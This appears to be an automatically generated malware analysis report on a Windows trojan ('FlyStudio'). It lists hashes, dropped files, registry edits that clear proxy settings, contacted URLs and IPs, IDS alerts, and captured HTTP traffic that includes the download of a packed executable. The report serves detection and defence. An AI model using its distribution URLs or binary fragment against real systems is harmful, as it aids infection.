Trojan.Win32.FlyStudio_36f49424fb

by malwarelabrobot on November 7th, 2017 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.FlyStudio.FD, Trojan.Win32.Sasfis.FD, Trojan.Win32.Swrort.3.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm, VirTool

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 36f49424fb426f479c75454e81909b54
SHA1: 3bb81b3feed2d3e82a28cd58059abbea8561520d
SHA256: b7dd99ff0a2108aa377b44fdc9b4635521c56a964fad04148f095d8d72a97f4e
SSDeep: 49152:0N47WOtQeS49t6KvsFaknFjDAp9pYrkAKXGwcxzV:0GiIjF8XFXnFv29okfXGzD
Size: 1622528 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Guco
Created at: 2017-10-18 05:00:56
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour	Description
EmailWorm	Worm can send e-mails.

Process activity

The Trojan creates the following process(es):

Bugreport.dll:512
%original file name%.exe:2060

The Trojan injects its code into the following process(es):

%original file name%.exe:3796

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process Bugreport.dll:512 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\data\Bugreport.ini (48 bytes)
C:\data\Bugreport_error.ini (1693 bytes)

The process %original file name%.exe:2060 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\%original file name%.exe (1 bytes)

The process %original file name%.exe:3796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\S09T3NA0.txt (91 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\JR6VY9G6.txt (409 bytes)
C:\data\Gutou.ini (676 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YAACNF8Y.txt (130 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\stat[1].htm (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\core[1].js (765 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\icon_11[1].gif (913 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\tongji[1].htm (952 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\X3F62G2R.txt (93 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\17287617[1].js (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\pic[1].gif (719 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\D9YRB8N4.txt (113 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HMGGW7AX.txt (261 bytes)
C:\data\Bugreport.ini (27 bytes)
C:\data\Bugreport.dll (629 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\stat[1].js (2459 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HMGGW7AX.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\D9YRB8N4.txt (0 bytes)

Registry activity

The process %original file name%.exe:2060 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process %original file name%.exe:3796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Size" = "10"

[HKLM\SOFTWARE\Microsoft\Tracing\36f49424fb426f479c75454e81909b54_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\36f49424fb426f479c75454e81909b54_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\36f49424fb426f479c75454e81909b54_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"InitHits" = "100"

[HKLM\SOFTWARE\Microsoft\Tracing\36f49424fb426f479c75454e81909b54_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\36f49424fb426f479c75454e81909b54_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Factor" = "20"

[HKLM\SOFTWARE\Microsoft\Tracing\36f49424fb426f479c75454e81909b54_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\36f49424fb426f479c75454e81909b54_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\36f49424fb426f479c75454e81909b54_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Enable" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5	File path
8bc70aaf699e21c985160a25d0d0610e	c:\%original file name%.exe
2aeb3f3b00d097cae1c0d3fd7a84cef1	c:\data\Bugreport.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
UPX0	4096	2433024	0	0	d41d8cd98f00b204e9800998ecf8427e
UPX1	2437120	1601536	1600000	5.46928	35e9bac95f24f4dc90b923386b4415e6
.rsrc	4038656	24576	21504	3.69233	38849d5969841e626ed900a510f647b7

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://d.gutousoft.com/å…¬å…±è½¯ä»¶ä¸‹è½½/ç§’è¯„ç§’èµž.txt	120.24.75.226
hxxp://d.gutousoft.com/å…¬å…±è½¯ä»¶ä¸‹è½½/éª¨å¤´æ‰¹é‡QQç©ºé—´åŠ¨æ€ç§’è¯„ç§’èµžåŠ©æ‰‹.exe	120.24.75.226
hxxp://vip.gutou.cc/	203.195.236.181
hxxp://d.gutousoft.com/	120.24.75.226
hxxp://d.gutousoft.com/kss_api/api.php?a=uplog&apiver=903&c=0&gdata=1&softcode=1000004&x=5099672	120.24.75.226
hxxp://d.gutousoft.com/up/tongji.htm	120.24.75.226
hxxp://all.cnzz.com.danuoyi.tbcache.com/stat.php?id=1252975436&show=pic
hxxp://all.cnzz.com.danuoyi.tbcache.com/core.php?web_id=1252975436&show=pic&t=z
hxxp://js.users.51.la/17287617.js	222.187.254.89
hxxp://z.gds.cnzz.com/stat.htm?id=1252975436&r=&lg=en-us&ntime=none&cnzz_eid=178159016-1509931833-&showp=1276x846&p=http://www.gutou.cc/up/tongji.htm#miaopingmiaozan_V12.5.3&t=tongji&umuuid=15f8f3646922f9-0e935720d5fc1f-44703d1f-1078c8-15f8f36469329c&h=1&rnd=525356111
hxxp://gm.gds.mmstat.com/9.gif?abc=1&rnd=431348710
hxxp://icon.cnzz.com.danuoyi.tbcache.com/img/pic.gif	222.186.49.224
hxxp://icon.users.51.la/icon_11.gif	42.236.73.3
hxxp://grp1.51.la/go.asp?svid=11&id=17287617&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1276,846&referrer=&vpage=http://www.gutou.cc/up/tongji.htm#miaopingmiaozan_V12.5.3&vvtime=1509936221385
hxxp://pcookie.gds.taobao.com/app.gif?&cna=XbqGEj8 TRoCAcLyYNp RQAT
hxxp://vip2.gutou.cc/kss_api/api.php?a=uplog&apiver=903&c=0&gdata=1&softcode=1000004&x=5099672	120.24.75.226
hxxp://y.gutousoft.com/	120.24.75.226
hxxp://pcookie.cnzz.com/app.gif?&cna=XbqGEj8 TRoCAcLyYNp RQAT	106.11.94.21
hxxp://web.users.51.la/go.asp?svid=11&id=17287617&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1276,846&referrer=&vpage=http://www.gutou.cc/up/tongji.htm#miaopingmiaozan_V12.5.3&vvtime=1509936221385	42.236.74.234
hxxp://s23.cnzz.com/stat.php?id=1252975436&show=pic	1.99.192.16
hxxp://c.cnzz.com/core.php?web_id=1252975436&show=pic&t=z	122.228.95.178
hxxp://www.gutou.cc/up/tongji.htm	120.24.75.226
hxxp://z5.cnzz.com/stat.htm?id=1252975436&r=&lg=en-us&ntime=none&cnzz_eid=178159016-1509931833-&showp=1276x846&p=http://www.gutou.cc/up/tongji.htm#miaopingmiaozan_V12.5.3&t=tongji&umuuid=15f8f3646922f9-0e935720d5fc1f-44703d1f-1078c8-15f8f36469329c&h=1&rnd=525356111	1.122.192.15
hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=431348710	106.11.92.23
hxxp://icon.cnzz.com/img/pic.gif	222.186.49.224

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.
ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System
ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /stat.htm?id=1252975436&r=&lg=en-us&ntime=none&cnzz_eid=178159016-1509931833-&showp=1276x846&p=http://VVV.gutou.cc/up/tongji.htm#miaopingmiaozan_V12.5.3&t=tongji&umuuid=15f8f3646922f9-0e935720d5fc1f-44703d1f-1078c8-15f8f36469329c&h=1&rnd=525356111 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.gutou.cc/up/tongji.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: z5.cnzz.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine

Date: Mon, 06 Nov 2017 02:43:40 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: close

Vary: Accept-Encoding

Content-Encoding: gzip

16................G..y......0..

GET /å…¬å…±è½¯ä»¶ä¸‹è½½/ç§’è¯„ç§’èµž.txt HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded

Accept: */*

Accept-Language: zh-cn

Referer: hXXp://d.gutousoft.com/å…¬å…±è½¯ä»¶ä¸‹è½½/ç§’è¯„ç§’èµž.txt

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d.gutousoft.com


HTTP/1.1 200 OK

Date: Mon, 06 Nov 2017 02:43:05 GMT

Server: Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.2.17

Last-Modified: Sat, 04 Nov 2017 01:56:52 GMT

ETag: "202-55d1e88ffc203"

Accept-Ranges: bytes

Content-Length: 514

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/plain

..........12.5.3..(....................)..............hXXp://d.gutouso
ft.com/å…¬å…±è½¯ä»¶ä¸‹è½½/éª%A
8å¤´æ‰¹é‡QQç©ºé—´åŠ¨æ€ç%
A7’è¯„ç§’èµžåŠ©æ‰‹.exe..hXXp://bubusof
t.dbankcloud.com/QQåŠ¨æ€æ‰¹é‡èµž/é%A
A¨å¤´æ‰¹é‡QQç©ºé—´åŠ¨æ€%
E7§’è¯„ç§’èµžåŠ©æ‰‹.exe.............
.................!....HTTP/1.1 200 OK..Date: Mon, 06 Nov 2017 02:43:05
 GMT..Server: Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.2.17..Last-M
odified: Sat, 04 Nov 2017 01:56:52 GMT..ETag: "202-55d1e88ffc203"..Acc
ept-Ranges: bytes..Content-Length: 514..Keep-Alive: timeout=5, max=100
..Connection: Keep-Alive..Content-Type: text/plain............12.5.3..
(....................)..............hXXp://d.gutousoft.com/å…¬%E
5…±è½¯ä»¶ä¸‹è½½/éª¨å¤´æ‰%B
9é‡QQç©ºé—´åŠ¨æ€ç§’è¯„ç%
A7’èµžåŠ©æ‰‹.exe..hXXp://bubusoft.dbankcloud.com/Q
QåŠ¨æ€æ‰¹é‡èµž/éª¨å¤´æ%8
9¹é‡QQç©ºé—´åŠ¨æ€ç§’è¯„%
E7§’èµžåŠ©æ‰‹.exe..............................!
....

<<< skipped >>>

GET /app.gif?&cna=XbqGEj8 TRoCAcLyYNp RQAT HTTP/1.1

Accept: */*

Referer: hXXp://VVV.gutou.cc/up/tongji.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Connection: Keep-Alive

Host: pcookie.cnzz.com


HTTP/1.1 200 OK

Date: Mon, 06 Nov 2017 02:43:43 GMT

Content-Type: image/gif

Content-Length: 43

Connection: close

P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"

Set-Cookie: cna=XbqGEj8 TRoCAcLyYNp RQAT; expires=Thu, 04-Nov-27 02:43:43 GMT; path=/; domain=.cnzz.com

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Cache-Control: no-cache

Pragma: no-cache

GIF89a.............!.......,...........L..;..

GET /kss_api/api.php?a=uplog&apiver=903&c=0&gdata=1&softcode=1000004&x=5099672 HTTP/1.1

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0  (compatible; MSiE 6.0; Windows NT 5.1;)

Accept-Encoding: gzip, deflate

Host: vip2.gutou.cc

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Mon, 06 Nov 2017 02:43:35 GMT

Server: Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.2.17

X-Powered-By: PHP/5.2.17

Set-Cookie: PHPSESSID=6ddf4ad5b296bce372bf72c92aa5c0ae; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Length: 151

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html;charset=utf-8
kssdata0:|:1:|:hXXp://d1.gutousoft.com/GTPLQQKJDTMPMZZS.htm:|:[2017-07
-21]......QQ..........................................................
.....:|::|:HTTP/1.1 200 OK..Date: Mon, 06 Nov 2017 02:43:35 GMT..Serve
r: Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.2.17..X-Powered-By: PHP
/5.2.17..Set-Cookie: PHPSESSID=6ddf4ad5b296bce372bf72c92aa5c0ae; path=
/..Expires: Thu, 19 Nov 1981 08:52:00 GMT..Cache-Control: no-store, no
-cache, must-revalidate, post-check=0, pre-check=0..Pragma: no-cache..
Content-Length: 151..Keep-Alive: timeout=5, max=100..Connection: Keep-
Alive..Content-Type: text/html;charset=utf-8..kssdata0:|:1:|:hXXp://d1
.gutousoft.com/GTPLQQKJDTMPMZZS.htm:|:[2017-07-21]......QQ............
...................................................:|::|:..

GET / HTTP/1.1

Accept: */*

Referer: hXXp://vip.gutou.cc

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vip.gutou.cc

Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Type: text/html;charset=utf-8

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Location: hXXp://gutou.cc/sale.php

Server: Microsoft-IIS/7.5

X-Powered-By: PHP/5.2.17

Set-Cookie: PHPSESSID=psc3samlk07fcqbemes0hbc7q7; path=/

X-Powered-By: ASP.NET

Date: Mon, 06 Nov 2017 02:43:27 GMT

Connection: close

Content-Length: 0

GET /9.gif?abc=1&rnd=431348710 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.gutou.cc/up/tongji.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: cnzz.mmstat.com

Connection: Keep-Alive


HTTP/1.1 302 Found

Date: Mon, 06 Nov 2017 02:43:41 GMT

Content-Type: image/gif

Content-Length: 43

Connection: close

P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"

Set-Cookie: cna=XbqGEj8 TRoCAcLyYNp RQAT; expires=Thu, 04-Nov-27 02:43:41 GMT; path=/; domain=.mmstat.com

Set-Cookie: sca=e6f0756b; path=/; domain=.cnzz.mmstat.com

Set-Cookie: atpsida=ea5a02159f313a5c8fb07244_1509936221_1; path=/; domain=.cnzz.mmstat.com

Location: hXXp://pcookie.cnzz.com/app.gif?&cna=XbqGEj8 TRoCAcLyYNp RQAT

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Cache-Control: no-cache

Pragma: no-cache

GIF89a.............!.......,...........L..;..

GET /17287617.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.gutou.cc/up/tongji.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: js.users.51.la

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: max-age=300

Content-Length: 1969

Content-Type: application/x-javascript

Last-Modified: Fri, 03 Nov 2017 07:01:34 GMT

Accept-Ranges: bytes

ETag: "268f14967154d31:65d0"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Mon, 06 Nov 2017 02:43:42 GMT

Connection: close
document.write ('<a href="hXXps://VVV.51.la/?17287617" target="_bla
nk" title="51.La 网站流量统计|
FB;统"><img alt="51.La 网站流量&#x
7EDF;计系统" src="//icon.users.51.la/icon_11.gif" st
yle="border:none" /></a>\n');..var a7617tf="51la";var a7617pu
="";var a7617pf="51la";var a7617su=window.location;var a7617sf=documen
t.referrer;var a7617of="";var a7617op="";var a7617ops=1;var a7617ot=1;
var a7617d=new Date();var a7617color="";if (navigator.appName=="Netsca
pe"){a7617color=screen.pixelDepth;} else {a7617color=screen.colorDepth
;}..try{a7617tf=top.document.referrer;}catch(e){}..try{a7617pu =window
.parent.location;}catch(e){}..try{a7617pf=window.parent.document.refer
rer;}catch(e){}..try{a7617ops=document.cookie.match(new RegExp("(^| )a
7617_pages=([^;]*)(;|$)"));a7617ops=(a7617ops==null)?1: (parseInt(unes
cape((a7617ops)[2])) 1);var a7617oe =new Date();a7617oe.setTime(a7617o
e.getTime() 60*60*1000);document.cookie="a7617_pages=" a7617ops  ";pat
h=/;expires=" a7617oe.toGMTString();a7617ot=document.cookie.match(new 
RegExp("(^| )a7617_times=([^;]*)(;|$)"));if(a7617ot==null){a7617ot=1;}
else{a7617ot=parseInt(unescape((a7617ot)[2])); a7617ot=(a7617ops==1)?(
a7617ot 1):(a7617ot);}a7617oe.setTime(a7617oe.getTime() 365*24*60*60*1
000);document.cookie="a7617_times=" a7617ot ";path=/;expires=" a7617oe
.toGMTString();}catch(e){}..try{if(document.cookie==""){a7617ops=-1;a7
617ot=-1;}}catch(e){}..a7617of=a7617sf;if(a7617pf!=="51la"){a7617o<<< skipped >>>

GET /icon_11.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.gutou.cc/up/tongji.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: icon.users.51.la

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: max-age=86400

Content-Length: 913

Content-Type: image/gif

Last-Modified: Fri, 26 May 2006 14:21:40 GMT

Accept-Ranges: bytes

ETag: "0f268b4cf80c61:978"

Server: Microsoft-IIS/6.0

Date: Mon, 06 Nov 2017 02:43:47 GMT

Connection: close
GIF89a0............._..@y./h..Y..Q..@........................!..NETSCA
PE2.0.....!.......,....0........I..8S!.....`).....J.....@.........`8..
.F.n......m.D.8.....*.......>1..i........I.l.m.?cs.pQ.Q.......w H=z
.XY.............{.xI2...2............C.8.6.y...........7......9.......
.......!.......,....(.....Z..I..8.A....!.fNW9..%].{....mH......J......
.@P...c.R(....!{.r'........,.{...W.:.v..in[kGD..!.......,....-.....i..
I..8k*.......q..^...o.eC...l. .."..V...6....Q...4&!.......M.S..4Xb.W..
..WUZ ....4..[..j.b'..gzeU.{e{....!.......,....-....._..I..8k:........
.9..%]...m;.k ....&.N...(.a).#...'/i. ......j.]...............X;.s'gxy
..g.Xyz...!.......,....-.....w..I..8k*.......QDE.C.q.%....R..Z..2DI.r!
R-.O...M..o....V#S..v..b.K!#..I.....\.v^(.....F..h.XAr.fy;. ..N&L'.(,j
.G..5..'..!.......,....-.....r..I..8k:.......Q.%..9..%].kM....=.......
....$..&N ..K.$<.QB...]p)..bO.i.`X#..w.-...h<e.g..n.}}yy..~v.we.
ys..r.t....;..

GET / HTTP/1.1

Accept: */*

Referer: hXXp://y.gutousoft.com

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: y.gutousoft.com

Cache-Control: no-cache


HTTP/1.1 302 Found

Date: Mon, 06 Nov 2017 02:43:27 GMT

Server: Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.2.17

X-Powered-By: PHP/5.2.17

Set-Cookie: PHPSESSID=5197a1d146102a5aafb305106aeb4c21; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

location: hXXp://gutou.cc/sale.php

Content-Length: 0

Content-Type: text/html;charset=utf-8

HTTP/1.1 302 Found..Date: Mon, 06 Nov 2017 02:43:27 GMT..Server: Apach
e/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.2.17..X-Powered-By: PHP/5.2.17.
.Set-Cookie: PHPSESSID=5197a1d146102a5aafb305106aeb4c21; path=/..Expir
es: Thu, 19 Nov 1981 08:52:00 GMT..Cache-Control: no-store, no-cache, 
must-revalidate, post-check=0, pre-check=0..Pragma: no-cache..location
: hXXp://gutou.cc/sale.php..Content-Length: 0..Content-Type: text/html
;charset=utf-8..

GET /img/pic.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.gutou.cc/up/tongji.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: icon.cnzz.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine

Content-Type: image/gif

Content-Length: 719

Connection: keep-alive

Date: Sun, 05 Nov 2017 11:30:41 GMT

Last-Modified: Fri, 16 Jan 2009 08:10:47 GMT

Expires: Mon, 06 Nov 2017 11:30:41 GMT

Cache-Control: max-age=86400

Accept-Ranges: bytes

Via: cache4.l2et15-1[10,304-0,C], cache29.l2et15-1[6,0], kunlun7.cn74[0,200-0,H], kunlun10.cn74[0,0]

Age: 54780

X-Cache: HIT TCP_MEM_HIT dirn:8:81051424 mlen:-1

X-Swift-SaveTime: Sun, 05 Nov 2017 11:30:41 GMT

X-Swift-CacheTime: 86400

Timing-Allow-Origin: *

EagleId: deba31a315099362219848965e

GIF89a2.........f..3...33.............................................
.......................................!..NETSCAPE2.0.....!..Powered b
y AFEI.!.......,....2...... !.di.hjBl..p,....x......`P.(...GR.D6...CH.
...,..@8.... -..EQc.8...........`...."....................~"..H.......
.H......"...$....#.........."..........."Z.......*...%!.!.......,....2
...... !.di.hjBl..p,....x..|....p r..H.C.\&.H.tJu...#b......7..W.h....
...7..l..v..-....."....................~"..I........I......"...$....#.
........."..........."\.......*...%!.!.......,....2...... !.di.hjBl..p
,....x..|....p r..H.C.\&.H.tJu...#b......7..W.h.......7..l..v..-....."
....................~"..I........I......"...$....#..........".........
.."\.......*...%!.;HTTP/1.1 200 OK..Server: Tengine..Content-Type: ima
ge/gif..Content-Length: 719..Connection: keep-alive..Date: Sun, 05 Nov
 2017 11:30:41 GMT..Last-Modified: Fri, 16 Jan 2009 08:10:47 GMT..Expi
res: Mon, 06 Nov 2017 11:30:41 GMT..Cache-Control: max-age=86400..Acce
pt-Ranges: bytes..Via: cache4.l2et15-1[10,304-0,C], cache29.l2et15-1[6
,0], kunlun7.cn74[0,200-0,H], kunlun10.cn74[0,0]..Age: 54780..X-Cache:
 HIT TCP_MEM_HIT dirn:8:81051424 mlen:-1..X-Swift-SaveTime: Sun, 05 No
v 2017 11:30:41 GMT..X-Swift-CacheTime: 86400..Timing-Allow-Origin: *.
.EagleId: deba31a315099362219848965e..GIF89a2.........f..3...33.......
......................................................................
.......!..NETSCAPE2.0.....!..Powered by AFEI.!.......,....2...... !.di
.hjBl..p,....x......`P.(...GR.D6...CH....,..@8.... -..EQc.8.......

<<< skipped >>>

GET /å…¬å…±è½¯ä»¶ä¸‹è½½/éª¨å¤´æ‰¹é‡QQç©ºé—´åŠ¨æ€ç§’è¯„ç§’èµžåŠ©æ‰‹.exe HTTP/1.1

Host: d.gutousoft.com

Accept: */*

Referer: hXXp://d.gutousoft.com/å…¬å…±è½¯ä»¶ä¸‹è½½

User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)

Pragma: no-cache

Cache-Control: no-cache

Connection: close


HTTP/1.1 200 OK

Date: Mon, 06 Nov 2017 02:43:06 GMT

Server: Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.2.17

Last-Modified: Sat, 04 Nov 2017 01:56:42 GMT

ETag: "18d800-55d1e886898fb"

Accept-Ranges: bytes

Content-Length: 1628160

Connection: close

Content-Type: application/x-msdownload

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
......................................................................
..............x...*...x...............W.......Rich....................
PE..L...c..Y.....................`...`%...=..p%...=...@...............
...........P>.............................................T?>...
....=.TO..............................................................
............................................UPX0.....`%...............
..............UPX1.........p%.....................@....rsrc....`....=.
.T..................@.................................................
......................................................................
......................................................................
......................................................................
......................................................................
.............3.07.UPX!........lE....=..|...@5.&K......3...U...K.......
